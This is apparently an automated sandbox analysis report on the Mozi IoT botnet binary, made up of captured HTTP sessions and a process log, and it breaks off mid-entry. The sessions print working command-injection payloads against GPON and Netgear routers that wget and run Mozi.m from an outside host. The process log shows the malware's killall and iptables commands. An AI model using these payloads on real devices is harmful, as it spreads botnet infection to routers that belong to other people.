Jan 6, 2021 15:01:37.779865026 CET | 1342 | IN | HTTP/1.0 400 Bad Request
                                                                                                        Server: AkamaiGHost
                                                                                                        Mime-Version: 1.0
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 248
                                                                                                        Expires: Wed, 06 Jan 2021 14:01:37 GMT
                                                                                                        Date: Wed, 06 Jan 2021 14:01:37 GMT
                                                                                                        Connection: close
                                                                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;HNAP1&#47;", is invalid.<p>Reference&#32;&#35;9&#46;446533b8&#46;1609941697&#46;39580f</BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port
36 | 192.168.2.20 | 59382 | 45.195.180.141 | 80
Timestamp | kBytes transferred | Direction | Data
Jan 6, 2021 15:01:37.824611902 CET | 1342 | OUT | POST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                        Host: 127.0.0.1:80
                                                                                                        Connection: keep-alive
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        Accept: */*
                                                                                                        User-Agent: Hello, World
                                                                                                        Content-Length: 118
                                                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
Jan 6, 2021 15:01:38.117810011 CET | 1343 | IN | HTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Wed, 06 Jan 2021 14:01:37 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 146
                                                                                                        Connection: keep-alive
                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Jan 6, 2021 15:01:38.117842913 CET | 1344 | IN | HTTP/1.1 400 Bad Request
                                                                                                        Server: nginx
                                                                                                        Date: Wed, 06 Jan 2021 14:01:37 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 150
                                                                                                        Connection: close
                                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
4 | 192.168.2.20 | 39582 | 190.186.252.62 | 8080
Timestamp | kBytes transferred | Direction | Data
Jan 6, 2021 14:57:56.798078060 CET | 236 | OUT | POST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                        Host: 127.0.0.1:8080
                                                                                                        Connection: keep-alive
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        Accept: */*
                                                                                                        User-Agent: Hello, World
                                                                                                        Content-Length: 118
                                                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                        5 | 192.168.2.20 | 52344 | 107.154.165.234 | 80
                                                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                                                        Jan 6, 2021 14:58:07.539832115 CET | 281 | OUT | POST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                        Host: 127.0.0.1:80
                                                                                                        Connection: keep-alive
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        Accept: */*
                                                                                                        User-Agent: Hello, World
                                                                                                        Content-Length: 118
                                                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                                                                                                        Jan 6, 2021 14:58:07.580197096 CET | 282 | IN | HTTP/1.1 503 Service Unavailable
                                                                                                        Content-Type: text/html
                                                                                                        Cache-Control: no-cache, no-store
                                                                                                        Connection: close
                                                                                                        Content-Length: 681
                                                                                                        X-Iinfo: 13-47382215-0 0NNN RT(1609941487307 54) q(0 -1 -1 -1) r(0 -1)
                                                                                                        Data Ascii: <html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=5&xinfo=13-47382215-0%200NNN%20RT%281609941487307%2054%29%20q%280%20-1%20-1%20-1%29%20r%280%20-1%29&incident_id=0-191092484336189581&edet=22&cinfo=ffffffff&rpinfo=0" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 0-191092484336189581</iframe></body></html>


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                        6 | 192.168.2.20 | 49116 | 195.154.172.83 | 80
                                                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                                                        Jan 6, 2021 14:58:07.609225988 CET | 282 | OUT | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                        Jan 6, 2021 14:58:07.714238882 CET | 284 | IN | HTTP/1.1 404 Not Found
                                                                                                        Content-Type: text/html
                                                                                                        Server: Microsoft-IIS/7.5
                                                                                                        X-Powered-By: ASP.NET
                                                                                                        Date: Wed, 06 Jan 2021 13:57:59 GMT
                                                                                                        Connection: close
                                                                                                        Content-Length: 1245
                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                        7 | 192.168.2.20 | 59784 | 158.199.197.56 | 80
                                                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                                                        Jan 6, 2021 14:58:07.804023027 CET | 285 | OUT | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                        Jan 6, 2021 14:58:08.105627060 CET | 285 | IN | HTTP/1.1 404 Not Found
                                                                                                        Date: Wed, 06 Jan 2021 13:58:07 GMT
                                                                                                        Server: Apache
                                                                                                        Vary: Accept-Encoding
                                                                                                        Content-Length: 207
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /setup.cgi was not found on this server.</p></body></html>


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                        8 | 192.168.2.20 | 45960 | 104.97.230.229 | 80
                                                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                                                        Jan 6, 2021 14:58:21.922020912 CET | 348 | OUT | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                        Jan 6, 2021 14:58:22.290241003 CET | 348 | IN | HTTP/1.0 400 Bad Request
                                                                                                        Server: AkamaiGHost
                                                                                                        Mime-Version: 1.0
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 208
                                                                                                        Expires: Wed, 06 Jan 2021 13:58:22 GMT
                                                                                                        Date: Wed, 06 Jan 2021 13:58:22 GMT
                                                                                                        Connection: close
                                                                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;45f3017&#46;1609941502&#46;57acacba</BODY></HTML>


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                        9 | 192.168.2.20 | 52400 | 66.49.194.21 | 80
                                                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                                                        Jan 6, 2021 14:58:28.688440084 CET | 382 | OUT | POST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                        Host: 127.0.0.1:80
                                                                                                        Connection: keep-alive
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        Accept: */*
                                                                                                        User-Agent: Hello, World
                                                                                                        Content-Length: 118
                                                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                                                                                                        Jan 6, 2021 14:58:33.834867954 CET | 403 | IN | HTTP/1.1 404 Not Found
                                                                                                        Date: Wed, 06 Jan 2021 13:58:29 GMT
                                                                                                        Server: Apache/2.4.46 (cPanel) OpenSSL/1.1.1i mod_bwlimited/1.4
                                                                                                        Content-Length: 315
                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                        System Behavior

                                                                                                        General

                                                                                                        Start time:14:57:20
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:/usr/bin/qemu-arm /tmp/Mozi.m
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        General

                                                                                                        Start time:14:57:20
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        General

                                                                                                        Start time:14:57:20
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        General

                                                                                                        Start time:14:57:20
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        General

                                                                                                        Start time:14:57:20
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:20
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:20
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/usr/bin/killall
                                                                                                        Arguments:killall -9 telnetd utelnetd scfgmgr
                                                                                                        File size:23736 bytes
                                                                                                        MD5 hash:df59c8b62bfcf5b3bd7feaaa2295a9f7

                                                                                                        General

                                                                                                        Start time:14:57:20
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        General

                                                                                                        Start time:14:57:20
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        General

                                                                                                        Start time:14:57:20
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 56870 -j ACCEPT"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I INPUT -p tcp --destination-port 56870 -j ACCEPT
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:n/a
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/modprobe
                                                                                                        Arguments:/sbin/modprobe ip_tables
                                                                                                        File size:9 bytes
                                                                                                        MD5 hash:3d0e6fb594a9ad9c854ace3e507f86c5

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 56870 -j ACCEPT"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I OUTPUT -p tcp --source-port 56870 -j ACCEPT
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 56870 -j ACCEPT"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I PREROUTING -t nat -p tcp --destination-port 56870 -j ACCEPT
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 56870 -j ACCEPT"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I POSTROUTING -t nat -p tcp --source-port 56870 -j ACCEPT
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 56870 -j ACCEPT"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I INPUT -p tcp --dport 56870 -j ACCEPT
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 56870 -j ACCEPT"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I OUTPUT -p tcp --sport 56870 -j ACCEPT
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 56870 -j ACCEPT"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I PREROUTING -t nat -p tcp --dport 56870 -j ACCEPT
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 56870 -j ACCEPT"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I POSTROUTING -t nat -p tcp --sport 56870 -j ACCEPT
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        General

                                                                                                        Start time:14:57:25
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        General

                                                                                                        Start time:14:57:30
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I INPUT -p tcp --dport 58000 -j DROP
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
